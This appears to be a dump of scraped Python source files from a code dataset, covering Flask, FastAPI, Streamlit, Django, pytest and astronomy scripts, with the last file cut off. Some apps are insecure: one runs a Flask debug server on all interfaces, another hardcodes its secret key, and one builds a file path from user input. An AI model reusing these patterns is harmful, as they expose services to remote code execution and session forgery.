res\n","sub_path":"algorithms/ReshapeTheMatrix/ReshapeTheMatrix.py","file_name":"ReshapeTheMatrix.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"165249783","text":"from flask import Flask, current_app, request, jsonify\nimport io\nimport json\nimport model\nimport base64\nfrom PIL import Image\nimport numpy as np\nimport logging\n\napp = Flask(__name__)\nlogging.basicConfig(level=logging.DEBUG)\n\n@app.route('/', methods=['POST'])\ndef style_transform():\n data = {}\n try:\n data = request.get_json()['data']\n style = request.get_json()['style']\n except KeyError:\n return jsonify(status_code='400', msg='Bad Request'), 400\n\n current_app.logger.info('Style: %s', style)\n \n data_dec = base64.b64decode(data) #Decode a Base64 encoded string.\n img_in = io.BytesIO(data_dec)\n \n #style = 'la_muse.ckpt'\n style = \"Model/\"+ style;\n \n img_out = model.rundeeplearning(img_in, style)\n\n \n data_out = base64.b64encode(img_out.getvalue()).decode() #encode a Base64 encoded string. \n #logging.info(data_out)\n \n return json.dumps({'data': data_out})\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080, debug=True)\n","sub_path":"Docker-transform-service/transform-service/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"144633709","text":"import copy\n\nimport pytest\n\nfrom template_matching import IntializeData\nfrom template_matching.run.single_process import TemplateMatching\nfrom template_matching.errors import TemplateMatchingException\n\n\n@pytest.fixture(scope='function', autouse=True)\ndef data():\n n_templates = 10\n data = IntializeData(n_templates)\n return data\n\n\n@pytest.fixture(scope='function')\ndef template_matching(data):\n templates_data = data.templates_data\n image_path = data.image_path\n\n template_matching = TemplateMatching(templates_data, image_path)\n yield template_matching\n\n del template_matching\n return\n\n\n# @pytest.mark.skip()\ndef test_1(data, template_matching):\n # set_templates(): OK\n # run(): OK\n n_templates = data.n_templates\n templates_data = data.templates_data\n image_path = data.image_path\n\n template_matching.set_templates(templates_data)\n results = template_matching.run(image_path)\n assert n_templates == len(results)\n return\n\n\n# @pytest.mark.skip()\ndef test_error_1(data, template_matching):\n # set_templates(): NG\n # run(): NG\n # set_templates(): OK\n # run(): OK\n n_templates = data.n_templates\n templates_data = data.templates_data\n image_path = data.image_path\n\n wrong_templates_data = copy.deepcopy(templates_data)\n wrong_templates_data[0] = {}\n with pytest.raises(Exception):\n template_matching.set_templates(wrong_templates_data)\n\n with pytest.raises(Exception):\n results = template_matching.run(image_path)\n\n template_matching.set_templates(templates_data)\n\n results = template_matching.run(image_path)\n assert n_templates == len(results)\n return\n\n\n# @pytest.mark.skip()\ndef test_error_2(data, template_matching):\n # set_templates(): OK\n # run(): NG\n # run(): OK\n n_templates = data.n_templates\n templates_data = data.templates_data\n image_path = data.image_path\n\n template_matching.set_templates(templates_data)\n\n wrong_image_path = 'wrong_path/to/image.jpg'\n with pytest.raises(Exception):\n results = template_matching.run(wrong_image_path)\n import time\n time.sleep(10)\n\n results = template_matching.run(image_path)\n assert n_templates == len(results)\n return\n","sub_path":"server/tests/test_run/test_single_process.py","file_name":"test_single_process.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"103617801","text":"from fastapi import APIRouter, Depends\nfrom fastapi.encoders import jsonable_encoder\nfrom typing import List\nfrom schemas.librarian import LibrarianInfo\nfrom schemas.student import StudentInfo\nfrom config.db import db\nfrom config.librarian_auth_config import get_current_active_user as get_current_librarian_user\nfrom config.student_auth_config import get_current_active_user as get_current_student_user\nfrom schemas.book import Book\n\nrouter = APIRouter()\ncollection = db.books\n\n\n@router.post('/book_entry', response_model=Book, response_description=\"New entry book record\")\nasync def new_book_entry(book: Book, current_user: LibrarianInfo = Depends(get_current_librarian_user)):\n new_entry = await collection.insert_one(jsonable_encoder(book))\n document = await collection.find_one({\"_id\": new_entry.inserted_id})\n return document\n\n\n@router.delete('/delete_a_book/{id}', response_description=\"Delete a book record\")\nasync def delete_a_book(id: str, current_user: StudentInfo = Depends(get_current_librarian_user)):\n search_book = await collection.find_one({\"_id\": id})\n if search_book:\n await collection.delete_one({\"_id\": id})\n return \"Successfully deleted a book record\"\n else:\n return f\"There is no book with this id {id}\"\n\n\n\n@router.get('/books&u=s', response_model=List[Book], response_description=\"Get all books\")\nasync def get_all_books(current_user: StudentInfo = Depends(get_current_student_user)):\n document = await collection.find().to_list(1000)\n return document\n\n\n@router.get('/books&u=l', response_model=List[Book], response_description=\"Get all books\")\nasync def get_all_books(current_user: LibrarianInfo = Depends(get_current_librarian_user)):\n document = await collection.find().to_list(1000)\n return document\n\n\n@router.get('/book/{id}', response_model=Book, response_description=\"Get a book\")\nasync def get_a_book(id: str, current_user: LibrarianInfo = Depends(get_current_librarian_user)):\n document = await collection.find_one({\"_id\": id})\n return document","sub_path":"backend/routes/book_info.py","file_name":"book_info.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"215473718","text":"import streamlit as st\r\nfrom PIL import Image, ImageOps\r\nimport numpy as np\r\nimport cv2 as cv\r\nimport keras\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.cm as cm\r\nfrom models.gradcam import GradCAM\r\nimport imutils\r\n\r\nimport tensorflow as tf\r\ntf.compat.v1.enable_eager_execution()\r\n\r\nIMG_SIZE = 50\r\nCATEGORIES = [\"Parasitized\", \"Uninfected\"]\r\n\r\n#######################################################################################\r\n\r\ndef teachable_machine_classification(image_array, model_file):\r\n # Load the model\r\n model = keras.models.load_model(model_file)\r\n\r\n # Create the array of the right shape to feed into the keras model\r\n img_arr = cv.resize(image_array, (IMG_SIZE, IMG_SIZE))\r\n new_arr = img_arr.reshape(-1, IMG_SIZE, IMG_SIZE, 1)\r\n # normalize the array\r\n new_arr = new_arr/255.0\r\n\r\n # run the inference\r\n pred = model.predict_classes(new_arr)\r\n return pred\r\n\r\n######################################################################################################\r\n\r\nst.title(\"Malaria parasite detection\")\r\nst.header(\"Malaria infected cell Classification Example\")\r\nst.text(\"Upload a cell Image for image classification as infected/Parasitized or uninfected\")\r\n\r\nuploaded_file = st.file_uploader(\"Choose a cell ...\", type=\"png\")\r\nif uploaded_file is not None:\r\n image = Image.open(uploaded_file)\r\n st.image(image, caption='Uploaded cell.', use_column_width=True)\r\n st.write(\"\")\r\n st.write(\"Classifying...\")\r\n st.write(uploaded_file.name)\r\n \r\n image1 = image.resize((50,50))\r\n gray = image1.convert(\"L\")\r\n img_array = np.array(gray)\r\n\r\n\r\n label = teachable_machine_classification(img_array, \"models/64_CNN.model\")\r\n\r\n if label > 0.50:\r\n st.write(\"The cell is Infected with malaria\")\r\n\r\n model = keras.models.load_model(\"models/64_CNN.model\")\r\n image2 = image.resize((100,100))\r\n\r\n doc = keras.preprocessing.image.img_to_array(gray) # -> numpy array\r\n doc = np.expand_dims(doc, axis=0)\r\n\r\n doc = doc/255.0\r\n\r\n cam = GradCAM(model, 0, \"conv2d_2\")\r\n heatmap = cam.compute_heatmap(doc)\r\n \r\n # resize the resulting heatmap to the original input image dimensions\r\n # and then overlay heatmap on top of the image\r\n heatmap = cv.resize(heatmap, (100,100))\r\n\r\n (heatmap, output) = cam.overlay_heatmap(heatmap, np.array(image2) , alpha=0.5)\r\n\r\n # # draw the predicted label on the output image\r\n\r\n # cv2.rectangle(output, (0, 0), (340, 40), (0, 0, 0), -1)\r\n # cv2.putText(output, \"label\", (10, 25), cv2.FONT_HERSHEY_SIMPLEX,``\r\n # \t0.8, (255, 255, 255), 2)\r\n # display the original image and resulting heatmap and output image\r\n # to our screen\r\n output = np.hstack([image2, output])\r\n output = imutils.resize(output, height=500, width=1000)\r\n st.image(output, caption=\"Hotspots that influence the prediction\")\r\n \r\n else:\r\n st.write(\"The cell is not infected with malaria\")\r\n\r\n\r\n\r\n\r\n####################################################################################\r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n\r\n\r\n ","sub_path":"Malaria Cell Classifier/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"62600671","text":"# -*- coding: utf-8 -*-\nimport time # used for generating mysql timestamps\nimport gc # garbage collector\n# used for generating a sitemap for google analytics\nfrom datetime import datetime, timedelta\n\n\"\"\" Flask imports \"\"\"\nfrom flask import Flask, render_template, flash, request, url_for, redirect, \\\n session, make_response\n\n\"\"\" Security imports \"\"\"\n# allows funtion wrapping used for protecting elevated rights restricted content\nfrom functools import wraps\n\n\"\"\" Project modules \"\"\"\n# WTForm classes\nfrom user_forms import RegistrationForm, ProfileForm\n# MySQL database management module, manages queries\nfrom db_manager import auth_user, set_uid, update_profile, db_search, register_user\n# dynamic dictionary module for link/url/content management\nfrom content_manager import Content\n\nfrom jaden_tweets import MakeTweet\n\n\"\"\" Flask Config \"\"\"\n# instatiate/declare instance of the Flask app class\napp = Flask(__name__)\n# server path to upload folder, not used currently\napp.config['UPLOAD_FOLDER'] = '/static/uploads/'\n# file extension whitelist for user uploads, not used currently\napp.config['ALLOWED_EXTENSIONS'] = set(['png', 'jpg', 'jpeg', 'gif'])\n\n\"\"\" Global Variables \"\"\"\n# populate reference dictionary from content manager {topic:[[url,description]]}\nREF_DICT = Content()\n\n\n## ----------------- TO DO ---------------- ##\n## -> set up session manager module ##\n\n\n# returns passed in attribute of active user from session/sqldb\ndef get_user(attribute):\n try:\n uid = session['uid']\n username = session['username']\n if attribute == 'uid':\n return uid\n elif attribute == 'username':\n return username\n else:\n return db_search(str(uid), attribute)\n except:\n return ''\n\n\n# @app.route('url')\n# @login_required\n# def page...\ndef login_required(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if 'logged_in' in session:\n return f(*args, **kwargs)\n else:\n flash('You need to login first')\n return redirect(url_for('loginpage'))\n return wrap\n\n\"\"\"----------------------------------\"\"\"\n\"\"\" Define site navigation templates \"\"\"\n\"\"\"----------------------------------\"\"\"\n\n\n@app.route('/', methods=['GET', 'POST']) # home directory\ndef homepage():\n try: # return the homepage template\n return render_template('homepage.html',\n USERNAME=get_user('username'))\n except Exception as ERROR: # Server Exception template with error message\n return render_template('500.html', ERROR=ERROR)\n\n\n# Realtime Overview Google analytics for this page\n@app.route('/jaden-tweets/') # https://goo.gl/wHJwST\ndef jadentweets():\n try:\n return render_template('jaden_tweets.html',\n USERNAME=get_user('username'),\n TWEET_BODY=MakeTweet(),\n TIMESTAMP=time.strftime('%-I:%M %p - %d %b %y'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.route('/dashboard/') # main landing for site nav\n@login_required\ndef dashboard():\n try:\n return render_template('dashboard.html',\n USERNAME=get_user('username'),\n UID=get_user('uid'),\n USERDATE=get_user('user_date'),\n FIRSTNAME=get_user('first_name'),\n LASTNAME=get_user('last_name'),\n NICKNAME=get_user('nickname'),\n COUNTRY=get_user('country'),\n STATE=get_user('state'),\n CITY=get_user('city'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.route('/projects/')\ndef projectpage():\n try:\n return render_template('projects.html',\n USERNAME=get_user('username'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.route('/reference/')\ndef referencepage():\n try:\n return render_template('reference.html',\n REF_DICT=REF_DICT,\n USERNAME=get_user('username'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.route('/support-donate/')\ndef donatepage():\n try:\n return render_template('donate.html',\n USERNAME=get_user('username'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.route('/about/technology/')\ndef technologypage():\n try:\n return render_template('technology.html',\n USERNAME=get_user('username'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.route('/contact/')\ndef contactpage():\n try:\n return render_template('contact.html',\n USERNAME=get_user('username'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.route('/about/tos/')\ndef termsofservicepage():\n try:\n return render_template('tos.html',\n USERNAME=get_user('username'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.route('/about/privacy-policy/')\ndef privacypage():\n try:\n return render_template('privacy.html',\n USERNAME=get_user('username'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n\"\"\"-------------------------------------------------------\"\"\"\n\"\"\" Define site authentication and registration functions \"\"\"\n\"\"\" with unique page templates \"\"\"\n\"\"\"-------------------------------------------------------\"\"\"\n\n\n@app.route('/edit-profile/', methods=['GET', 'POST'])\n@login_required\ndef editprofilepage():\n ERROR = ''\n form = ProfileForm()\n try:\n form = ProfileForm(request.form)\n if request.method == 'POST' and form.validate():\n # must be string for sql query\n # perform mysql query new_record/overwrite action\n update_profile(str(session['uid']), form)\n # flash success message to user\n flash(\"Your profile has been updated.\")\n return redirect(url_for('dashboard'))\n return render_template('edit_profile.html',\n USERNAME=get_user('username'),\n form=form)\n except Exception as ERROR:\n #flash(str(ERROR)) # debug output\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.route('/login/', methods=['GET', 'POST'])\ndef loginpage():\n ERROR = ''\n try:\n if request.method == 'POST':\n username = request.form['username']\n password = request.form['password']\n # authenticate user input\n if auth_user(username, password):\n # add logged in status & user info to session cookie\n session['logged_in'] = True\n session['username'] = username\n # this probably needs to be a string to fix SELECT *\n session['uid'] = set_uid(username)\n # show user success notification\n flash(\"You are now logged in.\")\n return redirect(url_for('dashboard'))\n else:\n ERROR = 'Invalid credentials, try again.'\n return render_template('login.html', ERROR=ERROR)\n except Exception as ERROR:\n return render_template('login.html', ERROR=ERROR)\n\n\n@app.route('/register/', methods=['GET', 'POST'])\ndef registerpage():\n form = RegistrationForm()\n try:\n # create instance of the Regisration form for the user\n form = RegistrationForm(request.form)\n # if the form is submitted and all form requirements are met\n if request.method == 'POST' and form.validate():\n new_user = register_user(form)\n username = form.username.data\n if new_user != 'success':\n # error message to user\n flash(new_user)\n # return to registration page\n return render_template('register.html', form=form)\n else:\n flash(new_user)\n # set session cookie values for user\n session['logged_in'] = True\n session['username'] = username\n session['uid'] = set_uid(username)\n # return logged in user to dashboard\n return redirect(url_for('dashboard'))\n return render_template('register.html', form=form)\n # Debugging error handling\n except Exception as ERROR:\n #flash(str(ERROR)) # debug output\n return render_template('register.html', ERROR=ERROR, form=form)\n\n\n@app.route('/logout/')\n@login_required\ndef logoutpage():\n session.clear()\n flash('You have logged out.')\n gc.collect()\n return redirect(url_for('homepage'))\n\n\n\"\"\"----------------\"\"\"\n\"\"\" Error Handling \"\"\"\n\"\"\"----------------\"\"\"\n\n\n@app.errorhandler(404)\ndef page_not_found(ERROR):\n try:\n return render_template('404.html', USERNAME=get_user('username'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.errorhandler(405)\ndef method_not_allowed(ERROR):\n try:\n return render_template('405.html', USERNAME=get_user('username'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n\"\"\"------------------\"\"\"\n\"\"\" Google analytics \"\"\"\n\"\"\"------------------\"\"\"\n\n\n# Generate a sitemap for SearchEngineOptimization\n@app.route('/sitemap.xml', methods=['GET'])\ndef sitemap():\n try:\n \"\"\"Generate sitemap.xml. Makes a list of urls and date modified.\"\"\"\n pages = []\n ten_days_ago = (datetime.now() - timedelta(days=7)).date().isoformat()\n # static pages\n for rule in app.url_map.iter_rules():\n if \"GET\" in rule.methods and len(rule.arguments) == 0:\n # pages.append ['server_domain' + str(rule, rule), ten_days_ago])\n pages.append(\n [\"http://173.169.201.187\" + str(rule.rule),\n ten_days_ago])\n sitemap_xml = render_template('sitemap_template.xml', pages=pages)\n response = make_response(sitemap_xml)\n response.headers[\"Content-Type\"] = \"application/xml\"\n return response\n except Exception as ERROR:\n #flash(str(ERROR)) # debug output\n return render_template('500.html', ERROR=ERROR)\n\n\nif __name__ == '__main__':\n app.secret_key = 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT'\n app.run()","sub_path":"FlaskApp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"251572747","text":"import random\n\nclass maze_maker:\n \"\"\"\n ダンジョンを自動生成する\n \"\"\"\n\n def __init__(self,MAZE_W,MAZE_H):\n self.MAZE_W = MAZE_W\n self.MAZE_H = MAZE_H\n self.maze = [[0]*self.MAZE_W for y in range(self.MAZE_H)]\n self.DUNGEON_W = MAZE_W*3\n self.DUNGEON_H = MAZE_H*3\n self.dungeon = [[0]*self.DUNGEON_W for y in range(self.DUNGEON_H)]\n\n def make_maze(self):\n \"\"\"\n 迷路を作る\n \"\"\"\n XP = [ 0, 1, 0,-1]\n YP = [-1, 0, 1, 0]\n\n #周囲の柱\n for x in range(self.MAZE_W):\n self.maze[0][x] = 1\n self.maze[self.MAZE_H-1][x] = 1\n for y in range(self.MAZE_H):\n self.maze[y][0] = 1\n self.maze[y][self.MAZE_W-1] = 1\n\n #中を空っぽに\n for y in range(1,self.MAZE_H-1):\n for x in range(1,self.MAZE_W-1):\n self.maze[y][x] = 0\n\n #柱\n for y in range(2,self.MAZE_H-2,2):\n for x in range(2,self.MAZE_W-2,2):\n self.maze[y][x] = 1\n\n for y in range(2,self.MAZE_H-2,2):\n for x in range(2,self.MAZE_W-2,2):\n d = random.randint(0,3)\n if x > 2:\n d = random.randint(0,2)\n self.maze[y+YP[d]][x+XP[d]] = 1\n\n def make_dungeon(self):\n \"\"\"\n 迷路からダンジョンを作る\n \"\"\"\n self.make_maze()\n for y in range(self.DUNGEON_H):\n for x in range(self.DUNGEON_W):\n self.dungeon[y][x] = 9\n for y in range(1,self.MAZE_H-1):\n for x in range(1,self.MAZE_W-1):\n dx = x*3+1\n dy = y*3+1\n if self.maze[y][x] == 0:\n if random.randint(0,99) < 20:\n for ry in range(-1,2):\n for rx in range(-1,2):\n self.dungeon[dy+ry][dx+rx] = 0\n else:\n self.dungeon[dy][dx] = 0\n if self.maze[y-1][x] == 0:\n self.dungeon[dy-1][dx] = 0\n if self.maze[y+1][x] == 0:\n self.dungeon[dy+1][dx] = 0\n if self.maze[y][x-1] == 0:\n self.dungeon[dy][dx-1] = 0\n if self.maze[y][x+1] == 0:\n self.dungeon[dy][dx+1] = 0\n\n\n def put_event(self):\n while True:\n x = random.randint(3,self.DUNGEON_W-4)\n y = random.randint(3,self.DUNGEON_H-4)\n if(self.dungeon[y][x] == 0):\n for ry in range(-1,2):\n for rx in range(-1,2):\n self.dungeon[y+ry][x+rx] = 0\n self.dungeon[y][x] = 1\n break\n for i in range(60):\n x = random.randint(3,self.DUNGEON_W-4)\n y = random.randint(3,self.DUNGEON_H-4)\n if(self.dungeon[y][x] == 0):\n self.dungeon[y][x] = random.choice([2,3,3,3,4])\n","sub_path":"maze_maker.py","file_name":"maze_maker.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"317523804","text":"#!/usr/bin/env python3\n\"\"\"\nScript used to download and format my training and test sets.\nOnly tested with:\nPython 3.5.2\nPandas 0.17.1\n\"\"\"\n\nimport requests\nimport pandas\nfrom functools import partial\nfrom io import StringIO\n\ntemplate = r'http://avaa.tdata.fi/palvelut/smeardata.jsp?variables={variablenames}&table=HYY_META&from={startyear}-01-01 00:00:00.000&to={endyear}-01-01 00:00:00.000&quality=ANY&averaging=30MIN&type=ARITHMETIC'\n\nstartyear = 2000\nendyear = 2016\n\ntestyear = 2016\n\n#Because it also takes the very first measurement of the next year.\nendyear = endyear + 1 \n\nvariables = {\"T504\": \"T lower\", \"T672\":\"T\", \"Pamb0\":\"Air pressure\", \"Net\":\"Net radiation\"}\n\n#this determines the order of the received data columns\nvariablestring = \"T504,T672,Pamb0,Net\"\n\n#It is not a large service, so trying to download too much would be inconsiderate\n#The API is subject to change, and has already done so once during this project work\n \nrequest = template.format(**{\"variablenames\":variablestring, \"startyear\":startyear, \"endyear\":endyear})\nprint(request)\n\nresponse = requests.get(request)\n\n#well, not much we can do if there is an HTTP code other than success\nif response.status_code != 200:\n raise ValueError(\"HTTP status code abnormal: \" + str(response.status_code))\n\n#save data in current folder in case we find trouble later\nwith open(\"./raw_avaa.csv\", \"w\") as outfile:\n outfile.write(response.text)\n\ndatabuffer = StringIO(response.text)\n#read into pandas dataframe, the date_parser seems somewhat inelegant, but does the job.\ndate_format = \"%Y %m %d %H %M %S\"\nfull_data = pandas.read_csv(databuffer, parse_dates={\"Time\":[\"Year\", \"Month\", \"Day\", \"Hour\", \"Minute\", \"Second\"]}, date_parser=partial(pandas.to_datetime, format=date_format), index_col='Time')\n\n#The original column names could work as well, but referring to things as tablename.variablename is a bit annoying\n#None of the data I use has a . in the variablename.\ndef drop_table_name(name):\n if name.startswith(\"HYY_META\"):\n return variables[name.split(\".\")[1]]\n else:\n return name\n \nfull_data.rename(columns=drop_table_name, inplace=True)\n\n#Clean rows where any of the values are missing (because the model is useless there)\n\nfull_data.dropna(inplace=True)\n\n#create new variables fraction of day [0,1), fraction of year [0,~1)\nfull_data['day fraction'] = pandas.Series((full_data.index.hour + full_data.index.minute/60.0)/24.0, index=full_data.index)\n#I don't really care that on leap years this a bit over 1.\nfull_data['year fraction'] = full_data.index.dayofyear/365.0\n\n#split off test year\ntest_data = full_data[full_data.index.year == testyear]\ntraining_data = full_data[full_data.index.year != testyear]\n\n#store for training script\ntraining_data.to_csv(\"./training_data.csv\")\ntest_data.to_csv(\"./test_data.csv\")\n","sub_path":"load_sets_from_AVAA.py","file_name":"load_sets_from_AVAA.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"483480175","text":"#\n# @lc app=leetcode id=409 lang=python3\n#\n# [409] Longest Palindrome\n#\n\n# @lc code=start\nclass Solution:\n def longestPalindrome(self, s: str) -> int:\n if len(s) == 0:\n return 0\n dictionary = {}\n for char in s:\n if char not in dictionary:\n dictionary[char] = 1\n else:\n dictionary[char] += 1\n odd = 0\n for item in dictionary:\n odd += (dictionary[item] % 2)\n if odd == 0:\n return len(s)\n return len(s) - odd + 1\n\n# @lc code=end\n\n","sub_path":"code/409.longest-palindrome.py","file_name":"409.longest-palindrome.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"507849610","text":"\"\"\"\n.. module:: parmenides.lazy\n :platform: any\n :synopsis: lazy implementation of Python functionality\n\n.. moduleauthor:: Jacob Collard \n\nIn some cases it is necessary to have a value that acts like an object of a\ncertain type, but does not import code from other packages until later on in\nthe program. In particular, it is often desirable to instantiate an object of a\nclass without importing that class, which may be dependent on global\nconfiguration values not yet set. For this reason, ``parmenides.lazy`` provides\nthe :class:`parmenides.lazy.LazyObject` class, which allows for the lazy\ninitialization of Python objects. Similarly, :class:`parmenides.lazy.LazyClass`\nprovides functionality for lazily importing a class.\n\"\"\"\n\nclass LazyObject(object):\n \"\"\"\n :param name: the dotted path to the Python class to instantiate\n :type name: str\n :param *args: the positional arguments to be passed when the class is\n initialized\n :param **kwargs: the keyword arguments to be passed when the class is\n initialized\n\n A ``LazyObject`` is a lazy implementation of Python object initialization.\n That is, a LazyObject acts like the initialization of a Python object, but\n only actually initializes the object when it is actually necessary to do\n so. \n\n Normally, initializing a Python object requires first importing the class,\n as below:\n\n >>> from mymodule import MyClass\n >>> myobj = MyClass(arg1, arg2, kwarg1=kwarg1, kwarg2=kwarg2)\n\n In some cases, this import can have unwanted side-effects not compatible\n with early program state. ``LazyObject``, however, does not require\n actually importing the class, as in the example below:\n\n >>> myobj = LazyObject('mymodule.MyClass', arg1, arg2, kwarg1=kwarg1,\n kwarg2=kwarg2)\n >>> # Now myobj can be used as an instance of mymodule.MyClass\n >>> myobj.method()\n\n A ``LazyObject`` acts like a normal object for many purposes, but not all.\n For example, it is possible to call the object's methods and values.\n However, the object's type remains ``LazyObject``. Also, the following\n values are reserved in ``LazyObjects``: ``_name``, ``_args``, ``_kwargs``,\n ``_evaluate`` and ``_instance``.\n \"\"\"\n\n def __init__(self, name, *args, **kwargs):\n\n self._name = name\n self._args = args\n self._kwargs = kwargs\n self._instance = None\n\n def __getattr__(self, key):\n\n try:\n return getattr(self.instance, key)\n except AttributeError:\n self.instance = self._evaluate\n return getattr(self.instance, key)\n\n def _evaluate(self):\n\n args = self._args\n kwargs = self._kwargs\n\n attrs = self._name.split('.')\n module_name = '.'.join(attrs[:-1])\n mod = __import__(module_name, fromlist=[attrs[-1]])\n cls = getattr(mod, attrs[-1])\n\n return cls(*args, **kwargs)\n\nclass LazyClass(object):\n \"\"\"\n A ``LazyClass`` makes it possible to lazily import a class. A ``LazyClass``\n object generally acts identically to a class imported normally, with a few\n exceptions. Most notably, the class cannot be used as an instance of\n 'type': type comparisons against the ``LazyClass`` will not work. However,\n the class will be callable as usual to create instances of the class.\n \"\"\"\n\n def __init__(self, name):\n\n self._name = name\n self._class = None\n\n def __getattr__(self, key):\n\n try:\n return getattr(self._class, key)\n except AttributeError:\n self._class = self._evaluate()\n return getattr(self._class, key)\n\n def _evaluate(self):\n\n attrs = self._name.split('.')\n module_name = '.'.join(attrs[:-1])\n mod = __import__(module_name, fromlist=[attrs[-1]])\n cls = getattr(mod, attrs[-1])\n\n return cls\n\n def __call__(self, *args, **kwargs):\n\n if not self._class:\n self._class = self._evaluate()\n \n return self._class(*args, **kwargs)\n","sub_path":"parmenides/lazy.py","file_name":"lazy.py","file_ext":"py","file_size_in_byte":4096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"218178043","text":"#! /usr/bin/ python\n# -*- coding=utf-8 -*- \n\n# A demo program for PyVO\n# 1. \n# 2. \n# 3. Use the datalink and SODA to make a cutout on this image around the\n# galaxies we are interested in. \n#\n# Make sure to have Aladin open and connected to the SAMP hub before\n# starting the script.\n#\n# Markus Demleitner and Hendrik Heinl\n# heinl@g-vo.org\n#\n\nimport pyvo\n\nimport tempfile\nimport contextlib\nimport os\nimport warnings\nimport sys\n\nfrom astropy import units as u\nfrom astropy.table import Table\nfrom astropy.io import votable\n \n\ndef get_single_radiosrc(ra,dec):\n \"\"\" Get radio sources with TAP-Query\"\"\"\n \n # Make the TAP service object\n service = pyvo.dal.TAPService (\"https://vo.astron.nl/tap\")\n\n # The ADQL query selects the data we nee: the source identifier, the\n # position (we need to know \"where\" to perform the cutout) and the\n # length of the major axis, to define the size of the cutout.\n # Looking into the errors in the positions, we give a bit of a\n # tolerance to the selection.\n\n query= \"\"\"\n SELECT \n lolss.source, lolss.ra, lolss.dec, lolss.maj_axis \n FROM lolss.source_catalog AS lolss\n WHERE DISTANCE (\n POINT ('', lolss.ra, lolss.dec),\n POINT ('', {pos_ra}, {pos_dec})\n ) < 100./3600.\n \"\"\".format(pos_ra=ra, pos_dec=dec)\n\n # Run Search ASTRON table to obtain mosaic data\n result = service.run_sync(\n query=query,)\n\n return result\n\n\n# PyVO won't let us send FITS image via samp, so here is the workaround\n# to make it do so!\n@contextlib.contextmanager\ndef accessible_binary(bytes, suffix=\".fits\"):\n \"\"\"\n a context manager making some bytes (typically: an image)\n available with a URL for local SAMP clients.\n \"\"\"\n handle, f_name = tempfile.mkstemp(suffix=suffix)\n with open(handle, \"wb\") as f:\n f.write(bytes)\n try:\n yield \"file://\" + f_name\n finally:\n os.unlink(f_name)\n\n\n# To make the process callable from external scripts, we define a new\n# function which will also be called in the main loop. \n\ndef recipe(ra,dec):\n\n # get data about radio sources from ASTRON services\n radiosource=get_single_radiosrc(ra,dec)\n\n # make the service object of the ASTRON TAP service\n svc = pyvo.dal.TAPService(\"https://vo.astron.nl/tap\")\n \n\t# get the data of the lolss mosaic\n result = svc.run_sync(\"SELECT pubdid FROM lolss.mosaic\")\n\n # We only have one result; get the datalink object for it.\n dl = next(result.iter_datalinks())\n \n # Get \"the\" processing service in there \n soda_svc = dl.get_first_proc()\n\n # And now do the cutouts:\n for (oid, ra, dec, maj_axis) in radiosource.to_table():\n a=soda_svc.process(\n circle=[\n ra*u.deg, dec*u.deg, \n maj_axis/3600*u.deg]).read()\n \n # Send the cutout to Aladin \n with accessible_binary(a) as img_url:\n with pyvo.samp.connection() as conn:\n\n pyvo.samp.send_image_to(\n conn=conn, \n url=img_url, \n client_name=\"Aladin\")\n\n return \"OK\"\n\n\ndef main():\n # Keep the output of this example \"sane\".\n if not sys.warnoptions:\n warnings.simplefilter(\"ignore\")\n\n # If run standalone, run the whole process for this position.\n recipe (240.484, 46.768)\n\n\nif __name__==\"__main__\":\n main()\n\n","sub_path":"pysrc/example5/astron_smart_cutout.py","file_name":"astron_smart_cutout.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"653227024","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext, loader, Context\nfrom apps.shop.models import ModelProduct, Product, Cart, CartItem\nfrom apps.clients.models import Client\nfrom django.shortcuts import get_object_or_404\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.db import connection\nfrom . import dictfetchall\nimport json\n\n\n@login_required(login_url='/login')\n@csrf_protect\ndef cart(request):\n if \"active_cart\" in request.session:\n cart = get_object_or_404(Cart, 